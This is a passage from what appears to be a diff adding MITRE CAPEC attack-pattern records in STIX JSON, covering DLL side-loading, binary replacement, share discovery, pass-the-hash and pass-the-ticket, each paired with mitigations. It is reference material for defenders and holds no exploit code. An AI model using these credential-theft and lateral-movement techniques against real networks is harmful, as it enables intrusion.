"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary places a malicious version of a Dynamic-Link Library (DLL) in the Windows Side-by-Side (WinSxS) directory to trick the operating system into loading this malicious DLL instead of a legitimate DLL. Programs specify the location of the DLLs to load via the use of WinSxS manifests or DLL redirection and if they aren't used then Windows searches in a predefined set of directories to locate the file. If the applications improperly specify a required DLL or WinSxS manifests aren't explicit about the characteristics of the DLL to be loaded, they can be vulnerable to side-loading.", + "external_references": [ + { + "external_id": "CAPEC-641", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/641.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "Hijack Execution Flow:DLL Side-Loading", + "external_id": "T1574.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/002" + }, + { + "description": "Stewart A., DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry, FireEye", + "external_id": "REF-501", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + } + ], + "id": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DLL Side-Loading", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must fail to verify the integrity of the DLL before using them." + ], + "x_capec_skills_required": { + "High": "Trick the operating system in loading a malicious DLL instead of a legitimate DLL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown DLLs from loading through using an allowlist policy.", + "id": "course-of-action--de1e1fe4-15df-4e37-9686-1b33e0ea2e10", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--81f3c1eb-7e57-4f55-a177-cadc6a8aeba8", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--de1e1fe4-15df-4e37-9686-1b33e0ea2e10", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c8fbd576-b3bb-43e0-b295-5483e8f56bdf", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2d42819b-82b4-4def-9360-d1f3e4d3ad65", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of sxstrace.exe on Windows as well as manual inspection of the manifests.", + "id": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0606876e-24f7-4cdd-812b-44db26e0f72b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require code signing and avoid using relative paths for resources.", + "id": "course-of-action--bdc2b3ee-acf1-4c8b-a330-6fa318ec5f88", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32d49392-d7f7-401f-91bc-541841219209", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdc2b3ee-acf1-4c8b-a330-6fa318ec5f88", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.", + "external_references": [ + { + "external_id": "CAPEC-642", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/642.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Compromise Client Software Binary", + "external_id": "T1554", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1554" + }, + { + "description": "Hijack Execution Flow:Executable Installer File Permissions Weakness", + "external_id": "T1574.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/005" + }, + { + "description": "Binary planting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Binary_planting" + } + ], + "id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Binaries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.", + "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." + ], + "x_capec_prerequisites": [ + "The attacker must be able to place the malicious binary on the target machine." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Insure that binaries commonly used by the system have the correct file permissions. Set operating system policies that restrict privilege elevation of non-Administrators. Use auditing tools to observe changes to system services.", + "id": "course-of-action--d9181e23-1afd-428e-a52a-e276bea7a05c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-642-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--85cbecfa-a889-485b-8231-630bdae5ed86", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9181e23-1afd-428e-a52a-e276bea7a05c", + "spec_version": "2.1", + "target_ref": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary discovers connections between systems by exploiting the target system's standard practice of revealing them in searchable, common areas. Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.", + "external_references": [ + { + "external_id": "CAPEC-643", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/643.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Network Share Discovery", + "external_id": "T1135", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1135" + } + ], + "id": "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Identify Shared Files/Directories on System", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is potentially able to identify the location of sensitive information or lateral pathways through the network.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line. The adversary, or their malware, can simply employ a set of commands that search for shared drives on the system (e.g., net view \\\\remote system or net share)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify unnecessary system utilities or potentially malicious software that may contain functionality to identify network share information, and audit and/or block them by using allowlist tools.", + "id": "course-of-action--60e5229d-6c9b-4ea1-a862-7a6797b8c070", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-643-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--877214d8-d718-4bc4-9edf-9b6d4d5bad4a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60e5229d-6c9b-4ea1-a862-7a6797b8c070", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "external_references": [ + { + "external_id": "CAPEC-644", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Hash", + "external_id": "T1550.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/002" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason", + "external_id": "REF-580", + "source_name": "reference_from_CAPEC", + "url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" + }, + { + "description": "Mitigating Pass-the-Hash and Other Credential Theft v2, Microsoft Corporation", + "external_id": "REF-581", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "How Pass-the-Hash works, Microsoft Corporation", + "external_id": "REF-582", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute", + "external_id": "REF-583", + "source_name": "reference_from_CAPEC", + "url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283" + } + ], + "id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Captured Hashes (Pass The Hash)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows credential hash value pairs: The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.

    2. Techniques
    An adversary purchases breached Windows credential hash value pairs from the dark web.
    An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.

Experiment

  1. Attempt domain authentication: Try each Windows credential hash value pair until the target grants access.

    2. Techniques
    Manually or automatically enter each Windows credential hash value pair through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "The adversary possesses known Windows credential hash value pairs that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Window credential hash value pairs for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent the use of Lan Man and NT Lan Man authentication on severs and apply patch KB2871997 to Windows 7 and higher systems.", + "id": "course-of-action--30748f93-76e1-4493-b028-a09a3ae0fe12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-644-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbe2baa0-43b4-4f18-8464-37c77c73232d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--30748f93-76e1-4493-b028-a09a3ae0fe12", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee496b22-cfdc-468f-9798-52b53cce0d3b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--885bfaa4-7ef5-4cd8-b4b3-eeaa867bc6d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c5bf1ff-d38b-4163-b8d6-d921aed35652", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage system penetration testing and other defense in depth methods to determine vulnerable systems within a domain.", + "id": "course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-644-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.", + "external_references": [ + { + "external_id": "CAPEC-645", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/645.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Ticket", + "external_id": "T1550.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/003" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + } + ], + "id": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Use of Captured Tickets (Pass The Ticket)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs physical access to the victim system.", + "The use of a third-party credential harvesting tool." + ], + "x_capec_skills_required": { + "High": "The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.", + "Low": "Determine if Kerberos authentication is used on the server." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Reset the built-in KRBTGT account password twice to invalidate the existence of any current Golden Tickets and any tickets derived from them.", + "id": "course-of-action--cc52780c-b04c-4940-a2d6-0498907ce5cf", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-645-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b6333f5-1f2a-4b5f-94e2-17a344115ffb", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc52780c-b04c-4940-a2d6-0498907ce5cf", + "spec_version": "2.1", + "target_ref": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8766158-fd84-4765-94da-1c65d865c83b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "spec_version": "2.1", + "target_ref": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries may attempt to obtain information about attached peripheral devices and components connected to a computer system. 